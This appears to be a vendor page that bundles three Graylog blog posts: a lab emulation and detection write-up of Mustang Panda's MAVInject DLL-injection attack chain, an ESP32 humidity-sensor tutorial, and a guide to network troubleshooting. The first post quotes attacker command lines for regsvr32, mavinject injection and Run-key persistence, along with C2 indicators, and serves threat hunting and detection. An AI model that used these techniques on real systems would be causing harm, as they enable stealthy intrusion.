At Graylog, our vision is a secure digital world where organizations of all sizes can effectively guard against cyber threats. We’re committed to turning this vision into reality by providing Threat Detection & Response that sets the standard for excellence. Our cloud-native architecture delivers SIEM, API Security, and Enterprise Log Management solutions that are not just efficient and effective—whether hosted by us, on-premises, or in your cloud—but also deliver a fantastic Analyst Experience at the lowest total cost of ownership. We aim to equip security analysts with the best tools for the job, empowering every organization to stand resilient in the ever-evolving cybersecurity landscape.

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

Adversary Tradecraft: Emulating Mustang Panda’s Use of MAVInject in Recent Campaigns

In cybersecurity, the adage “what’s old is new” continues to hold true as attackers resurface longstanding techniques or repurpose them with new twists and adaptations. The popularization of Living Off the Land Binaries (LOLBins) — legitimate, Windows-native tools commonly abused for malicious uses — is a great example of this. Many of these methods have existed for decades yet remain effective in the modern security landscape, especially as many organizations are still ill-advised and unequipped to combat them. Being able to spot Mustang Panda’s use of MAVInject in recent campaigns is very important for security teams.

 

The LOLBin star for today’s blog is Microsoft Application Virtualization Injector (MAVInject) which is (un)surprisingly still kicking since its first buzz around 2017. We’ll cover its particular role in a novel attack chain reported by Trend Micro researchers whereby the threat group Mustang Panda combines legitimate components with malicious payloads to reduce likelihood of detection.

 

In this blog we’ll emulate the infection chain described in the report and analyze the activity it produces in Graylog. Throughout and at the end of the post, we share threat hunting and detection approaches that you can apply in your own environments.

 

Attack Overview

The attack likely starts with a spear-phishing email attachment. When executed by the victim, IRSetup.exe is used to drop multiple files to the system. In the case of the Trend Micro report, the files were placed in a newly created C:\ProgramData\session directory.

The report’s execution flow diagram seen below shows how the kill chain progresses from the initial dropper all the way to payload execution, ultimately leading to Command and Control (C2) communication to the attacker-controlled server www[.]militarytc[.]com over port 443.

Attack flow chart

 

Key elements

  • exe opens a decoy PDF to distract the victim while the malicious payload is deployed in the background.
  • The legitimate Electronic Arts (EA) application OriginLegacyCLI.exe is executed to sideload EACore.dll, which contains the actual malicious functionality. The DLL is a modified version of Mustang Panda’s TONESHELL backdoor.
  • The malware checks if ESET security software is running on the host by looking for its associated processes ekrn.exe or egui.exe.
  • If present, it uses MAVInject to inject itself into the legitimate Windows application waitfor.exe and triggers code that establishes the connection to its C2 server.
  • Otherwise, MAVInject is skipped and the code is directly injected into waitfor.

 

“DLL? Sideloading?? Injection???”, one might be thinking as they read through that. Not to worry, these concepts will be demystified as we emulate the chain ourselves later.

 

It seems that Mustang Panda might’ve found this use of MAVInject to fly under the radar of ESET software specifically, though that remains unclear – ESET since responded that this technique is not a bypass to its protections.

 

Persistence

 While researching this attack, we came across a report on Any.Run that exhibits a similar kill chain. It includes a persistence mechanism via registry Run key that wasn’t mentioned in the original report.

This mechanism enables the malware to maintain its foothold on the compromised host. Even if the system is restarted, it will be re-infected once the user logs in.

 

Emulating the Adversary

 

Lab setup

To emulate and analyze the attack, we’ve set up a lab environment with Graylog Enterprise 6.1.7 and Illuminate Windows Security Event Logs Content Pack enabled to parse, normalize and enrich the logs. Graylog Security is also included to integrate Sigma rule detections.

 

A Windows Server 2022 system will serve as our “victim host”. Its configuration sends System, Security, PowerShell/Operational, and Defender event logs via Graylog Sidecar to our Graylog instance. Auditing is explicitly enabled for process execution (command line included), registry changes in commonly abused locations, and file system changes in the ProgramData folder.

 

We’ve built custom binaries — programs, that is — that closely mimic the malware’s core functionality based on Trend Micro’s analysis, all bundled into a custom IRSetup dropper. To trigger the Mavinject flow, we placed “dummy” programs that mimic ESET running processes. This works because the malware only checks for the process names.

 

Detonating the mimic malware

Aaaaand, detonate💥!

We see that the mimic dropper wrote files to the ProgramData\session folder and auto-launched the decoy PDF. Waitfor.exe is also running in Task Manager.

 

 

 

It looks like the infection chain of our mimic malware followed through. Let’s hop over to Graylog to get a detailed view of the activity that occurred.

 

IRSetup dropper

 IRSetup.exe itself isn’t malware — it’s created using a legitimate Windows software installer builder named Setup Factory, in this case abused to drop and execute the malicious files. Attackers favor legitimate tools to blend into environments and make it harder for detection logic to separate malicious from benign activity. It also saves them the trouble of implementing these components themselves.

 

While we don’t have the actual Setup Factory installer, our mimic dropper does replicate its main function. In the screenshot below we see activity marking the beginning of the infection, sorted by ascending time (read top to bottom):

  1. Event ID 4688 (process creation) shows IRSetup.exe being executed
  2. This is followed by file system events where the installer writes the PDF, EACore.dll, and OriginLegacyCLI.exe files to C:\ProgramData\session
  3. The installer proceeds to execute OriginLegacyCLI.exe

 

 

This is where the fun begins (props if you know that reference). Shown below is the rest of the infection chain following OriginLegacyCLI.exe execution. We’ll break down each part and write some threat hunting queries along the way.

 

 

EACore DLL sideloading

 

OriginLegacyCLI.exe gets executed in block 1. We don’t have the visibility from these Windows events to see EACore.dll getting sideloaded as a result (Sysmon would help with that), but we can infer that it happened based on the activity following.

OriginLevacy CLI Exe shown in logs from Mustang Panda’s Use of MAVInject

So, what is DLL sideloading? Before that even, what’s a DLL?

 

A DLL, or Dynamic Link Library, is a shared file used by Windows programs to perform certain functions without having to include all the necessary code within the program itself. Developers load and import ready-made code libraries from DLLs into their applications so they don’t have to reinvent functionality that’s already been written.

 

DLL sideloading is a technique where a legitimate application unknowingly loads a malicious DLL instead of the intended one, allowing attackers to execute their code while appearing legitimate. It’s similar to DLL hijacking, the difference being that the attacker places the trojanized DLL alongside the target application EXE and directly invokes the application to proxy execute the DLL.

 

In the Mustang Panda infection chain, the attacker positions the legitimate, signed 3rd-party application OriginLegacyCLI.exe and a tampered EACore.dll in the same directory. When OriginLegacyCLI.exe runs, it follows a search order to look for the DLL it needs by name, in this case “EACore.dll”, and load it.

 

 

DLLs in the same folder as the application take priority in the search order hierarchy. OriginLegacyCLI finds that the backdoored EACore.dll matches its search first, and loads it unaware that it’s been swapped. Upon load or import of functionality, the malicious code housed in the DLL gets executed.

 

This method is highly effective because it exploits trust in legitimate applications and is difficult to identify, helping malware evade security detections. For this reason it’s often a preferred execution method by Red Teams and threat actors alike.

 

ESET check and RegSvr32

 

At this point the malicious code in EACore is running under the mask of OriginLegacyCLI, and we move to block 2.

 

According to the Trend Micro report, the malware checks for ESET running on the system and, if present, “registers EACore.dll using regsvr32.exe to execute the DLLRegisterServer function”, seen in the command line:

“C:\Windows\System32\regsvr32.exe” /s “C:\ProgramData\session\EACore.dll”

EACORE dll being run for Mustang Panda’s Use of MAVInject

 

Put simply, RegSvr32 is a Windows utility that can be abused to proxy execute malicious code. Instead of EACore invoking its own function, it takes the long way of having RegSvr32 do it. The result is the start of the next infection phase now under the parent process of regsvr32.exe.

 

Again, we see the use of a built-in Windows utility in an attempt to thwart detections.

 

DLL injection via MAVInject

 

Now for what we’ve all been waiting for. If you’re here, you’ve probably weathered the technical hailstorm that was the last few sections, and to that I give a swift salute.

 

We’re now in block 4, where we see waitfor.exe process creation followed by DLL injection into that process using MAVInject.

waitfor process and dll injection using MAVInject for Mustang Panda’s Use of MAVInject

 

So, DLL injection.

 

In this context, DLL injection is a method of executing malicious code inside of another, often legitimate, running process. It takes a DLL and forces the separate process to load and execute it, enabling malicious activity under the guise of that process.

 

As we see above, the malware first launches the legitimate Windows program waitfor.exe with the intent to inject into it.

“C:\Windows\SysWOW64\waitfor.exe” “Event19030087251541”

 

It captures the process ID (PID) 6896 of the newly spawned waitfor.exe to be referenced during injection.

It then runs Mavinject.exe to inject itself, EACore.dll, into waitfor.exe referencing its PID 6896.

“C:\Windows\SysWOW64\mavinject.exe” 6896 /INJECTRUNNING “C:\ProgramData\session\EACore.dll”

 

Once EACore.dll is injected into waitfor.exe, it establishes a network connection to the C2 server for control over the compromised system.

 

That’s the gist. If you’re here for the details, it triggers an execution flow to decrypt, allocate and execute shellcode that opens a reverse shell to the C2 and sends information about the victim host. The C2 server communicates with the host using a custom command protocol.

 

We can hunt for MAVInject DLL injection using the following query in Graylog.

process_command_line:/.* \/INJECTRUNNING .*/

 

INJECTRUNNING for Mustang Panda’s Use of MAVInject

 

Looking for waitfor.exe spawned under regsvr32.exe is another useful query.

process_name:waitfor.exe AND process_parent_name:regsvr32.exe

 

 

Decoy PDF

 

As a little bonus, our mimic dropper also opens the decoy PDF.

Mimic dropper opens a decoy pdf

 

Run key persistence

 

Going back to the start of this blog post, we identified that the malware might also set autostart persistence in the registry to survive reboots.

 

In block 3 above, there are registry modification events that show the malware creating a Run key under `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run`.

 

Viewing the details of Event ID 4657 (registry value was modified) in Graylog, we see that the key name masquerades as Microsoft Edge Auto Launch. It’s set to execute OriginLegacyCLI.exe (and therefore the EACore.dll TONESHELL backdoor) upon user logon in order to re-infect the system.

 

 

We can hunt for registry HKCU\Run key persistence with event IDs 4657 or 4663. Here is an example query using ID 4663 to uncover registry Run key writes from OriginLegacyCLI.exe (Bear in mind that this won’t catch instances where OriginLegacyCLI is renamed or replaced, remove the process_name condition to cover those).

event_code:4663 AND process_name:OriginLegacyCLI.exe AND file_path:/.*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run/

 

 

Detections

 

We recommend the following SigmaHQ rules to detect this attack chain and similar events:

 

We can easily add these rules with Graylog Security. Add the SigmaHQ repository and import all, then search for and enable the rules.

 

For “Potentially Suspicious Child Process of Regsvr32” you will have to add waitfor.exe to the Image list, like so.

 

 

 

Indicators

 

These indicators will primarily be useful for hunting past intrusions that went unnoticed. They have little effectiveness in detecting future intrusions by Mustang Panda as threat actors tend to burn or alter their tools and infrastructure between campaigns.

 

OriginLegacyCLI.exe (legitimate application targeted for sideloading) SHA-256:
91357E6E5A8DB3D9D3B23CE4368425A148683287D917D927EE2BB6E835C87EBE

 

EACore.dll (modified TONESHELL backdoor) SHA-256:
DC673D59A6A9DF3D02E83FD03AF80E117BEA20954602AE416540870B1B3D13C4

 

Registry HKCU/Run key (persistence mechanism) Name:
MicrosoftEdgeAutoLaunch_DAC5ED36BBAC4D19045B4BAFA91EF8729

Value:
“c:\programdata\session\OriginLegacyCLI.exe”

www[.]militarytc[.]com:443 (C2 server hostname and port)

193[.]56[.]255[.]179 (C2 server IP address)

 

In general, look for Mavinject.exe execution and outbound network connections from unexpected Windows programs. Ensure that execution of Potentially Unwanted Programs (PUPs) and unauthorized software is tracked in your environment.

 

Graylog Detections

Graylog has provided the Sigma Rules and Indicators here to share threat detection intelligence with those not running Graylog Security. Note that Graylog Security customers receive a content feed including Sigma Rules, Anomaly Detectors, Dashboards, and other content to meet various security use cases.

 

To learn how Graylog can help you improve your security posture, contact us today or watch a demo.

About Graylog
At Graylog, our vision is a secure digital world where organizations of all sizes can effectively guard against cyber threats. We’re committed to turning this vision into reality by providing Threat Detection & Response that sets the standard for excellence. Our cloud-native architecture delivers SIEM, API Security, and Enterprise Log Management solutions that are not just efficient and effective—whether hosted by us, on-premises, or in your cloud—but also deliver a fantastic Analyst Experience at the lowest total cost of ownership. We aim to equip security analysts with the best tools for the job, empowering every organization to stand resilient in the ever-evolving cybersecurity landscape.

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

IoT Sensor Data into Graylog: A Lab Guide

Graylog has always been associated with log management, metrics, SIEM and security monitoring—but it’s also a great tool for creative, low-cost experiments in a home lab. I wanted to use it for real-world sensor data, so I built a DIY temperature and humidity monitor using an ESP-WROOM-32 development board and a DHT22 sensor. This project shows you how to create a lightweight API endpoint on the ESP32, poll it regularly using Graylog’s HTTP API input, and visualize the results in a live dashboard.

I wanted a way to integrate temperature and humidity status into Graylog and send alerts for temperature and low humidity for my equipment room.  Really, my guitar room! I wanted to ensure the humidity was not going below a certain level, potentially causing damage to my prized guitars.

Hardware Used

  • ESP-WROOM-32 (ESP32) development board
  • DHT22 Digital Temperature & Humidity Sensor
  • A few jumper wires
  • A WiFi Network for it to connect to
  • A Graylog Instance on the same network
  • An HTTP API Input configured on Graylog

ESP-WROOM-32

DHT22 Sensor

The DHT22 data pin is connected to GPIO4. Power comes from the ESP32’s 3.3V rail.

DHT22 Temp Humidity sensor

Wiring It Up

The Arduino Code

Arduino is a great way to experiment with many sensors and modules. With most ESP32 boards having WiFi, Bluetooth and a very large community you can almost do anything. You will require the Arduino IED on Windows or Linux to load the code onto an ESP32 Module.  There many aftermarket ESP32 boards so finding the correct board in the IDE can be tricky.  A little trial and error might be necessary.

How This Setup Works

The ESP32 hosts a web server on port 80. When a GET request is sent to “http://ipaddress/sensor”, it responds with the current temperature (in both Celsius and Fahrenheit) and humidity in JSON format. I used the AsyncWebServer, DHT, and ArduinoJson libraries.

Here’s the code running on the ESP32:


#include <WiFi.h>
#include <AsyncTCP.h>
#include <ESPAsyncWebServer.h>
#include <DHT.h>
#include <ArduinoJson.h>

// http://<ESP32_IP>/sensor (how to poll the data)

// WiFi credentials
const char* ssid = "ssidname";
const char* password = "ssidpassword";

// Define DHT type & GPIO
#define DHTPIN 4
#define DHTTYPE DHT22

DHT dht(DHTPIN, DHTTYPE);
AsyncWebServer server(80);

// Define device location
const char* deviceLocation = "Room Location"; // Change this to machine your sensor location

void setup() {
  Serial.begin(115200);
  dht.begin();

  WiFi.begin(ssid, password);
  while (WiFi.status() != WL_CONNECTED) {
    delay(1000);
    Serial.println("Connecting to WiFi...");
  }
  Serial.println("Connected to WiFi");

  server.on("/sensor", HTTP_GET, [](AsyncWebServerRequest *request){
    float tempC = dht.readTemperature();
    float tempF = dht.readTemperature(true);
    float humidity = dht.readHumidity();

    if (isnan(tempC) || isnan(tempF) || isnan(humidity)) {
      request->send(500, "application/json", "{\"error\":\"Failed to read from DHT sensor\"}");
      return;
    }

    StaticJsonDocument<200> jsonDoc;
    jsonDoc["location"] = deviceLocation;
    jsonDoc["temperature_C"] = tempC;
    jsonDoc["temperature_F"] = tempF;
    jsonDoc["humidity"] = humidity;

    String jsonResponse;
    serializeJson(jsonDoc, jsonResponse);
    request->send(200, "application/json", jsonResponse);
  });

  server.begin();
}

void loop() {
  // Nothing needed in loop since server runs asynchronously
}

The Output

Once it’s running, you  can visit http://<ESP32_IP>/sensor to get output like this:

{
"location": "Location Name",
"temperature_C": 20,
"temperature_F": 68,
"humidity": 44.1
}

Getting Data into Graylog

To get this data into Graylog, I set up an HTTP API input. This input type is perfect for ingesting structured JSON from IoT devices or scripts. Note: I did not setup advanced token security or any other more secure setup. This could include an API key in your Arduino setup.  This was for basic use and always for best practice, secure your stuff.

Temp Input Screenshot

Here’s the approach:

  • The ESP32 code doesn’t push data—it just serves it in this case.
  • I scheduled the input to poll every 6 hours
  • It hits the /sensor endpoint, and then pulls the data to Graylog.

Visualizing It in Graylog

Once the data is flowing in, it’s easy to build a dashboard that gives you a real-time view of your environment. I created widgets to show temperature and humidity over time, and also added gauges for current values.

If you want to get creative, you can even trigger alerts for thresholds—like if the humidity spikes or the temp drops below safe levels for a server rack or in my case, the guitar room 🙂

Ideas for Future Expansion

  • Add multiple sensors and Graylog inputs for different rooms
  • Include motion or door sensors
  • Combine sensor data with home firewall logs to correlate physical presence with network activity
  • Use anomaly detection to flag environmental shifts

Final Thoughts

This was a fun way to get another project into Graylog alerts. Feeding in structured JSON from a homemade sensor opens the door to a wide range of creative monitoring setups.

If you try something similar or take it further, I’d love to hear about it.

About Graylog
At Graylog, our vision is a secure digital world where organizations of all sizes can effectively guard against cyber threats. We’re committed to turning this vision into reality by providing Threat Detection & Response that sets the standard for excellence. Our cloud-native architecture delivers SIEM, API Security, and Enterprise Log Management solutions that are not just efficient and effective—whether hosted by us, on-premises, or in your cloud—but also deliver a fantastic Analyst Experience at the lowest total cost of ownership. We aim to equip security analysts with the best tools for the job, empowering every organization to stand resilient in the ever-evolving cybersecurity landscape.

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

Essential Steps for Troubleshooting Network Problems

Everyone has a story about that one road trip where traffic got backed up, making people late to the event. When you have network connectivity problems, your information highway gets clogged up, making it difficult for users to access resources efficiently.

 

While network troubleshooting strategies may seem simple, a lot of nuance and complexity lies in the activities when you dig into your data. Connectivity issues can come from various sources, and they have a wide-ranging impact across internal operations, customer experience, and overall productivity.

 

By learning the types of problems and how to diagnose them, you can troubleshoot network issues more rapidly. Many tools like Wireshark can be used to help troubleshoot network issues. Central Log Management is Important when identifying application failures, slow web response times, and many other erratic behaviors on the network.

 

What Is Troubleshooting a Network?

Troubleshooting network issues takes a systematic approach to:

  • Identifying and resolving connectivity issues
  • Ensuring optimal network performance
  • Providing seamless network access

 

Network, IT, and security teams often collaborate when troubleshooting a network problem because the underlying issues can come from:

  • Device hardware
  • Software or firmware issues
  • Cyber attacks

 

By documenting each step in the evaluation and resolution process, you can meet compliance requirements and, hopefully, prevent the same problem from happening again.

 

What Impact do Network Connectivity Issues Have on Businesses?

Network connectivity issues can disrupt business operations by preventing workforce members or customers from accessing resources. These disruptions often lead to:

  • Lost productivity: Unable to connect to applications or files required to perform job functions
  • Preventing collaboration: Inability to use cloud-based collaboration tools, like messaging applications
  • Lost revenue: Interruption of transactions can cause financial issues, like customer church or business disruption
  • Customer dissatisfaction: Inability to access services undermines customer trust and loyalty

 

What are the Types of Network Issues?

Understanding the various types of network issues can act as a good starting point for investigating them and improving your network’s reliability.

 

1.   Hardware Issues

Hardware issues can lead to connectivity difficulties, performance degradation, and network outages. They often arise from device misconfigurations or hardware failures. Common problems include:

  • Overheating components
  • Low battery status
  • Damaged cables

 

To maintain your network, you should regularly review the configuration of routers, switches, and cables.

 

2.   Software Issues

Software conflicts resulting from outdated operating systems, software, or firmware can make applications incompatible. Some ways to prevent these problems include:

  • Regularly updating operating systems, software, and firmware
  • Scanning for vulnerabilities
  • Monitoring network traffic
  • Reviewing system logs

 

3. Bandwidth Issues

Bandwidth limitations can cause network congestion, slow speeds, and increased latency. High-bandwidth activities can overload the network. For example, downloading large files or streaming videos during peak times can slow down the network.

Some ways to prevent these problems include:

  • Regular monitoring and configuring of network devices
  • Proper bandwidth allocation and utilization

 

4. Configuration Issues

Misconfigured network devices or software can lead to performance bottlenecks and prevent access to external networks. For example, incorrect IP addressing can create connectivity issues. Regularly reviewing and updating configuration files can mitigate these issues.

 

5. Firewall and IP Management Issues

Misconfigured firewalls or conflicting security policies can block legitimate network traffic, leading to connectivity issues. However, overly permissive rules or outdated firewall software can expose the network to vulnerabilities, potentially leading to a data breach. For example, bloated firewall rulesets can mean that the device or application takes more time to scan traffic, slowing down the network.

Some ways to prevent these problems include:

  • Regularly reviewing firewall configurations
  • Optimizing rulesets
  • Deleting shadowed or unused rules

 

6. Security Incidents

Security incidents can impact network performance in several ways. For example, a Distributed Denial of Service (DDoS) attack floods the web server with too many requests which impacts both the server’s availability and the bandwidth on the server’s network. Additionally, security incidents that include data theft may slow down networks as attackers download high volumes of data.

Some ways to mitigate these risks include:

  • Monitoring networks for abnormal activity
  • Monitoring user account data to identify anomalies
  • Requiring multi-factor authentication (MFA) prior to granting network access

 

5 Network Troubleshooting Best Practices

In complex, connected IT environments, troubleshooting network issues can feel overwhelming. For example, when someone calls the help desk to report that an application isn’t functioning right, investigating the problem can feel overwhelming since it could come from the following:

  • Web server where the application resides
  • Database that application uses
  • Network segment

 

1.   Centralize Logs

Your logs give you information about activities across your environment. Every device and technology generates logs, so collecting the information in a single location allows you to correlate issues that make your investigation faster. Some locations that you should consider collecting logs from include:

  • Hubs
  • Switches
  • Routers
  • Bridges
  • Gateways
  • Modems
  • Repeaters
  • Access Points
  • Firewalls

 

2.   Create Dashboards

With all log data in a single location, you can create dashboards that make it easier to gain visibility into what’s happening across your environment. For example, you can correlate information from your network devices, firewalls, and user logins to understand how people are using your network and what abnormal behavior looks like. These dashboards make it easier for you to start an investigation by helping narrow down where the problem lies.

3.   Create Alerts

Part of creating dashboards is high-level visibility. The other half is getting the information available to create alerts that drive investigations across IT and security issues. Since many different factors can lead to a network issue, high-fidelity alerts that make it easier to distinguish between events like software conflicts and DDoS attacks can help you get the network up and running faster.

 

4.   Conduct Regular Audits

When you regularly audit your network security settings and configurations, you can mitigate network outage risks. Whenever you make changes to the settings and configurations, you should document them because changes can disrupt service, giving you a potential starting point for your investigation.

 

5.   Adhere to an Escalation Framework

An escalation framework enables you to direct problems to the appropriate expertise levels. For example, you can use the Information Technology Infrastructure Library (ITIL) version 4 framework practices for incident management to create different tiers of service. Tier 1 troubleshooting may handle basic issues, while more complex network problems require people with more experience who can provide advanced intervention.

 

Graylog Enterprise and Security: Comprehensive Network Insights for Troubleshooting Network Issues

Graylog Enterprise makes it easier for you to navigate through your data and respond to network issues faster. With Graylog Enterprise, you can accelerate quick problem identification and resolution while improving collaboration across different internal teams.

 

When you need comprehensive insights into your security posture, Graylog Security has you covered. As the only security information and event management (SIEM)/threat detection and incident response (TDIR) platform with native data routing, tiering, and archiving in a single technology, you can level up your security capabilities to identify network-based attacks faster.

 

 

About Graylog
At Graylog, our vision is a secure digital world where organizations of all sizes can effectively guard against cyber threats. We’re committed to turning this vision into reality by providing Threat Detection & Response that sets the standard for excellence. Our cloud-native architecture delivers SIEM, API Security, and Enterprise Log Management solutions that are not just efficient and effective—whether hosted by us, on-premises, or in your cloud—but also deliver a fantastic Analyst Experience at the lowest total cost of ownership. We aim to equip security analysts with the best tools for the job, empowering every organization to stand resilient in the ever-evolving cybersecurity landscape.

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.